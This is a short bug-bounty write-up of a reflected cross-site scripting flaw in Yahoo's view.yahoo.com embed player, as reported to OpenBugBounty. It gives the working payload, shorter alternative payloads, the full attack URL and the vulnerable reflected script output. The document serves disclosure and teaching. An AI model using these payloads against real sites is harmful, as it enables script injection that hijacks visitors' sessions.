XSS at view.yahoo.com

From Hackipedia
Jump to: navigation, search
OpenBugBounty #186099
Target: Yahoo.com
Target Module: view.yahoo.com
Type: XSS
Original Link
Payload </title></script/'-alert(0)-'"-"-->"><svg/onload=prompt(/OPENBUGBOUNTY/)>

A reflective XSS was reported by Spam404 to OpenBugBounty

The injection point was in a social site button script to build a Hulu box on the page. Any social buttons are usually added as an after thought and are not part of the regular application construction. Therefore social site buttons/links are much more likely to be subject to injection attacks and should be given a second look.

They pay load used excessive escapes as normally found in bots.

Some smaller payloads that would have worked

'*alert(1)*'
</script><svg onload=alert(1)>

Attack URL:

https://view.yahoo.com/embed/player?shareUrl=</title></script/'-alert(0)-'"-"-->"><svg/onload=prompt(/OPENBUGBOUNTY/)>

Result:

    <script nonce=8cbceb41-e3e3-40d2-aaab-67920bd94841 type="text/javascript">
        window.HuluPlayerConfig = {
            enable_end_card: false,
            enable_autoplay: true,
            enable_share: true,
            enable_age_gate: true,
            enable_mature_intro: true,
            embed_age_gate_intro: true,
            countdown_time: 0,
            facebook_share_link: '</title></script/'-alert(0)-'"-"-->"><svg/onload=prompt(/OPENBUGBOUNTY/)>?utm_source=facebook&utm_medium=referral&utm_campaign=desktop_player',
            twitter_share_link: '</title></script/'-alert(0)-'"-"-->"><svg/onload=prompt(/OPENBUGBOUNTY/)>?utm_source=twitter&utm_medium=referral&utm_campaign=desktop_player',
            embed_code: '',
            hide_embed_button: true,
            video_link: '</title></script/'-alert(0)-'"-"-->"><svg/onload=prompt(/OPENBUGBOUNTY/)>',
            up_next: [],
        };
    </script>